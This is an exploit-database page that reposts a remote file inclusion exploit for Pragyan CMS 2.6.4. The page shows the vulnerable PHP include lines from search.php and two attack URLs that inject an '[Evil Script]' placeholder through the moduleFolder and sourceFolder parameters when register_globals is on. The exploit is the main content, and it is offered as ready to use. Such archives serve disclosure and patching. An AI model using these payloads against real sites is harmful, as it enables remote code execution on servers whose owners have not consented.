|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7121 Credit : Mr.SeCreT Date : 04.09.2009 Exploit Code : # SecurityReason Note : # # register_globals = On # ###################### Author: ############################# Author: Mr.SeCreT E-mail: g-ff@hotmail.com From: Syria Greatz To: All My Friends and Tryag.cc/cc members and moderators ############## Script Information: ######################### Scipt: Pragyan CMS 2.6.4 (Search.php) Remote File Inclusion Vulnerability Language: PHP Download: http://garr.dl.sourceforge.net/project/pragyan/pragyan/2.6.4/pragyan-2.6.4. tar.gz ################### Vul Code: ############################## $searchModuleFolder = "$sourceFolder/$moduleFolder/search"; $include_dir = "$searchModuleFolder/include"; include ("$include_dir/commonfuncs.php"); ################### Exploit: ############################### www.site.com/path/cms/modules/search/search.php?moduleFolder=[Evil Script] www.site.com/path/cms/modules/search/search.php?sourceFolder=[Evil Script] ############################################################ The End  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
libc:fts_*() Multiple Denial of Service
The fts functions are provided for traversing UNIX file hierarchies... |
||
| Apache |  |
|
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
» Apache Tomcat 6.0.20 and |
||
| PHP | |
|
- 2009-10-02| Copyright © SecurityReason.com. All Rights Reserved. |